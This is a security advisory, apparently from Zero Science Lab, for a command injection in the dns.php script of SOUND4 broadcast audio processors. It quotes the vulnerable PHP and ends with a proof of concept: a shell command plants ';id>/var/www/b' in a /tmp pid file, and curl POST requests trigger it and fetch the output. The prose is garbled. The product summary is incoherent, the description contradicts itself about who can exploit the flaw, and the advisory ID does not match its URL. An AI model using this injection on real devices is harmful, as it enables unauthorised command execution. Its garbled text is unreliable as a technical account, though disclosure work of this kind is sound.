SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (dns.php) Conditional Command Injection
Vendor: SOUND4 Ltd.
Product web page: https://www.sound4.com | https://www.sound4.biz
Affected version: FM/HD Radio Processing:
Impact/Pulse/First (Version 2: 1.1/2.15)
Impact/Pulse/First (Version 1: 2.1/1.69)
Impact/Pulse Eco 1.16
Voice processing
BigVoice4 1.2
BigVoice2 1.30
Web-Audio Streaming:
Stream 1.1/2.4.29
Watermarking:
WM2 (Kantar Media) 1.11
Summary: SOUND4 IMPACT is an ingenious process that combines mono and stereo sound.
To achieve perfect stereo processing, each part of the signal is processed individually.
Consistency in both sound quality and level. In moving, you must be consistent in sound and level.
reception occurs when the FM receiver changes from mono to stereo and then back again
Stereo reduces the volume and sound variation by more than 90%.
Stereo expander is an option in the SOUND4-IMPACT processing chain
Basically, without limitations.
SOUND4 is a powerful and versatile product that offers advanced functionality.
PULSE offers clients the best price-performance ratio.
It is more than a processor. It is flexible and powerful.
Radio broadcasting standards are fully compatible with the sound quality of this product.
It can also be used for streaming, DAB and FM simultaneously.
SOUND4 FIRST offers all of the essential functions you require
High performance FM/HD processors.
Affordable. This product is designed to produce a high-quality sound.
This tool allows you to perform 2-band processing and a digital stereogenerator.
Clipper for IMPACT
Desc: The vulnerability allows an authenticated local user to create a
File in the directory /tmp that contains malicious commands File
must include the following commands:
File can only be executed by an unauthenticated external attacker.
Call the compromised script, and make one HTTP POST request.
The attacker may gain control of the system’s command execution. The request will be granted.
Once the command is executed, all files containing malicious code will be removed.
————————————————————————-
/var/www/dns.php:
—————–
02: if ($_SERVER[“REQUEST_METHOD”] == “POST” && isset($_POST[‘dns_host’]) && isset($_POST[‘networkid’])) {
03: $pidfilename=”/tmp/” . $_POST[‘networkid’] . “.dns.pid”;
04: if( file_exists($pidfilename)) {
05: $procid=file_get_contents($pidfilename);
06: shell_exec(“pkill -P “.$procid);
07: }
…
…
29: unlink($pidfilename);
30: exit();
————————————————————————-
It was tested on Apache/2.4.25 (Unix).
OpenSSL/1.0.2k
PHP/7.1.1
GNU/Linux 5.10.43 (armv7l)
GNU/Linux 4.9.228 (armv7l)
Gjoko “LiquidWorm” Krstic discovered vulnerability
Macedonian Information Security Research and Development Laboratory
Zero Science Lab – https://www.zeroscience.mk – @zeroscience
ZSL-2022-57333 Advisory ID
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5733.php
26.09.2022
—
#On the Server
> echo “;id>/var/www/b” > /tmp/251.dns.pid
#External
> curl -XPOST -sk https://RADIO/dns.php –data “dns_host=m00t&networkid=251”
> curl XPOST https://RADIO/b
uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)